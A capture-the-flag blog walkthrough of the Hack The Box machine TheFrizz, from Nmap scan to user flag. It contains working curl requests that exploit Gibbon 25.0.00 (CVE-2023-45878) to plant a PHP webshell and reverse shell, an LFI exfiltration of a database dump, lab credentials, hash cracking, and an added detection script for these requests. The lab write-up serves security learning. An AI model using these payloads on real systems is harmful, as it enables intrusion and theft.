TheFrizz

User Flag

Nmap Scan

As always, we start with an Nmap scan:

# Nmap 7.95 scan initiated Sat Mar 15 21:21:24 2025 as: /usr/lib/nmap/nmap -Pn -p- -A --min-rate 5000 -oN scan.txt 10.10.11.60
Nmap scan report for 10.10.11.60 (10.10.11.60)
Host is up (0.050s latency).
Not shown: 65520 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh?
| fingerprint-strings:
| NULL:
|_ Exceeded MaxStartups
53/tcp open domain Simple DNS Plus
80/tcp open http Apache httpd 2.4.58 (OpenSSL/3.1.3 PHP/8.2.12)
|_http-title: Did not follow redirect to http://frizzdc.frizz.htb/home/
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: frizz.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
64081/tcp open msrpc Microsoft Windows RPC
64085/tcp open msrpc Microsoft Windows RPC
64093/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port22-TCP:V=7.95%I=7%D=3/15%Time=67D5EF6F%P=x86_64-pc-linux-gnu%r(NULL
SF:,16,"Exceeded\x20MaxStartups\r\n");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022|2012|2016 (89%)
OS CPE: cpe:/o:microsoft:windows_server_2022 cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows Server 2022 (89%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2016 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Hosts: localhost, FRIZZDC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 7h00m00s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-03-16T04:22:59
|_ start_date: N/A
TRACEROUTE (using port 139/tcp)
HOP RTT ADDRESS
1 50.73 ms 10.10.14.1 (10.10.14.1)
2 50.81 ms 10.10.11.60 (10.10.11.60)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Mar 15 21:24:35 2025 -- 1 IP address (1 host up) scanned in 191.48 seconds

I added frizzdc.frizz.htb to /etc/hosts:

echo -e "10.10.11.60\tfrizzdc.frizz.htb" | sudo tee -a /etc/hosts
10.10.11.60 frizzdc.frizz.htb

I then looked at frizzdc.frizz.htb to check what we have. It is an educational website powered by Gibbon. The first thing I noticed was a notice stating that accounts will be unavailable for 48 hours due to Gibbon's migration to Azure AD SSO. Additionally, I observed that the Gibbon version is 25.0.00. A quick Google search shows that this version of Gibbon has a lot of vulnerabilities. One critical issue in Gibbon version 25.0.00 is an unauthenticated arbitrary file write vulnerability: the endpoint rubrics_visualise_saveAjax.php does not require authentication, allowing an attacker to create PHP files. This in turn enables unauthenticated Remote Code Execution (RCE), CVE-2023-45878. After reading the PoC, I crafted this payload to generate a PHP file that allows me to execute remote code:

curl -X POST "http://frizzdc.frizz.htb/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php" \
-H "Host: frizzdc.frizz.htb" \
--data-urlencode "img=image/png;asdf,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4K" \
--data-urlencode "path=shell.php" \
--data-urlencode "gibbonPersonID=0000000001"

The response was shell.php. I was inside the web service now. I tried to get a reverse shell using PowerShell payloads from revshells but failed. I then updated the PHP code sent with the POST request via curl, writing a reverse shell to the file shell.php:

curl -X POST "http://frizzdc.frizz.htb/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php" \
-H "Host: frizzdc.frizz.htb" \
--data-urlencode "img=image/png;asdf,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" \
--data-urlencode "path=shell.php" \
--data-urlencode "gibbonPersonID=0000000001"

I set up a listener on port 4444 and got a reverse shell. I needed to escape the web service. Investigating the current directory, I could see an interesting config.php file; it contained credentials for the Gibbon database, so I dumped the database in order to transfer it to my local machine and analyze it:

mysqldump --user=MrGibbonsDB --password=MisterGibbs!Parrot!?1 gibbon > gibbon-backup.sql

To transfer it locally, I exploited CVE-2023-34598, a Local File Inclusion (LFI) vulnerability. It allows including the content of various files within the installation folder in the server's response by manipulating the q parameter. To exploit this, I moved the SQL backup file into the Gibbon website's installation folder and accessed it through the browser. I found these credentials inside the dumped database. I needed to crack the password, so I checked Gibbon's source code to determine how the password is hashed: Gibbon hashes passwords using SHA-256 with a prepended salt. To crack it, I used Hashcat with this command:

sudo hashcat -m 1420 -a 0 hash.txt /usr/share/wordlists/rockyou.txt

After the cracking process, I retrieved the plaintext password using:

sudo hashcat --show -m 1420 thefrizz/hash.txt
067f746faca44f170c6cd9d7c4bdac6bc:342c608687733f80ff784242b0b0c03:/aACFhikmNopqrRTVz2489:Jenni_Luvs_Magic23
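As an added defender-side example (not part of the original writeup), the following Python flags the three web-side request patterns used above in Apache access logs: POSTs to the unauthenticated Rubrics endpoint (CVE-2023-45878), follow-up GETs to a PHP file with a cmd parameter (webshell use), and q values pointing at traversal or non-PHP files (CVE-2023-34598). The endpoint path is taken from the writeup; the log lines and the 10.10.14.x client addresses are constructed.

```python
# Added example, not from the original post: flag the request patterns this
# writeup produces in Apache access logs. Endpoint path is from the writeup;
# the log lines and 10.10.14.x client addresses are constructed.
import re
from urllib.parse import parse_qs, urlsplit

# Common Log Format: client ident user [timestamp] "METHOD URI PROTO" status ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})')
# CVE-2023-45878: this module endpoint accepts POSTs without a session.
WRITE_ENDPOINT = "/modules/Rubrics/rubrics_visualise_saveAjax.php"
# CVE-2023-34598: Gibbon routes normal pages via q=/modules/<x>.php, so only
# traversal or non-PHP targets (dumps, backups, text files) count as LFI here.
LFI_SUFFIXES = (".sql", ".bak", ".zip", ".txt", ".log")

def classify(line):
    """Return the alert tags for one access-log line (empty list if benign)."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparsed"]
    parts = urlsplit(m.group("uri"))
    path, qs = parts.path, parse_qs(parts.query)
    alerts = []
    if m.group("method") == "POST" and path.endswith(WRITE_ENDPOINT):
        alerts.append("rubrics_file_write")
    # Heuristic for webshell use: any PHP file invoked with a cmd= parameter.
    if path.endswith(".php") and "cmd" in qs:
        alerts.append("webshell_cmd")
    if any(".." in q or q.lower().endswith(LFI_SUFFIXES) for q in qs.get("q", [])):
        alerts.append("lfi_q_param")
    return alerts

def scan(log_text):
    """Map line index -> alert tags for every suspicious line in the log."""
    return {i: tags for i, line in enumerate(log_text.splitlines())
            if (tags := classify(line))}

# Constructed sample: one request per pattern, plus two benign Gibbon requests.
SAMPLE_LOG = """\
10.10.14.5 - - [15/Mar/2025:21:30:01 +0000] "POST /Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php HTTP/1.1" 200 13
10.10.14.5 - - [15/Mar/2025:21:30:09 +0000] "GET /Gibbon-LMS/shell.php?cmd=whoami HTTP/1.1" 200 42
10.10.14.5 - - [15/Mar/2025:21:35:20 +0000] "GET /Gibbon-LMS/index.php?q=gibbon-backup.sql HTTP/1.1" 200 812340
10.10.14.9 - - [15/Mar/2025:21:36:00 +0000] "GET /Gibbon-LMS/index.php?q=/modules/Timetable/tt.php HTTP/1.1" 200 5120
10.10.14.9 - - [15/Mar/2025:21:37:00 +0000] "GET /home/ HTTP/1.1" 302 0
"""

if __name__ == "__main__":
    for idx, tags in scan(SAMPLE_LOG).items():
        print(idx, tags)
```

Because POST bodies are not logged, the file-write rule keys on the endpoint alone; pair it with a file-integrity check on the Gibbon web root to confirm a write actually landed.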

I tried to SSH using the username f.frizzle:

ssh f.frizzle@frizz.htb
f.frizzle@frizz.htb: Permission denied (gssapi-with-mic,keyboard-interactive).

However, I encountered the error shown above. After some research, I found that the SSH server is using GSSAPI (Generic Security Services API) with Kerberos for SSO authentication.
First of all, I updated /etc/ssh/ssh_config by enabling GSSAPI:

GSSAPIAuthentication yes
GSSAPIDelegateCredentials yes

And I had to create a krb5.conf file:

[libdefaults]
default_realm = FRIZZ.HTB
[realms]
FRIZZ.HTB = {
kdc = frizzdc.frizz.htb
admin_server = 10.10.11.60
}
[domain_realm]
.frizz.htb = FRIZZ.HTB
frizz.htb = FRIZZ.HTB

To access SSH using SSO, I needed to obtain a Ticket-Granting Ticket (TGT).
I initiated a ticket request using the username f.frizzle and the password Jenni_Luvs_Magic23:

kinit -V f.frizzle@FRIZZ.HTB

Output:

Using default cache: /tmp/krb5cc_1000
Using principal: f.frizzle@FRIZZ.HTB
Password for f.frizzle@FRIZZ.HTB:
Authenticated to Kerberos v5

To verify the ticket, I used:

klist

Output:

Ticket cache: FILE:/tmp/krb5cc_1000
Default principal: f.frizzle@FRIZZ.HTB
Valid starting Expires Service principal
03/28/2025 22:52:07 03/29/2025 08:52:07 krbtgt/FRIZZ.HTB@FRIZZ.HTB
renew until 03/29/2025 22:51:34

Finally, I tried to SSH again:

ssh f.frizzle@frizz.htb


And I got the user flag!

TheFrizz
https://dahmanisec.me/posts/thefrizz/thefrizz/
Author
Abderrahim Dahmani
Published at
2025-03-24
License
CC BY-NC-SA 4.0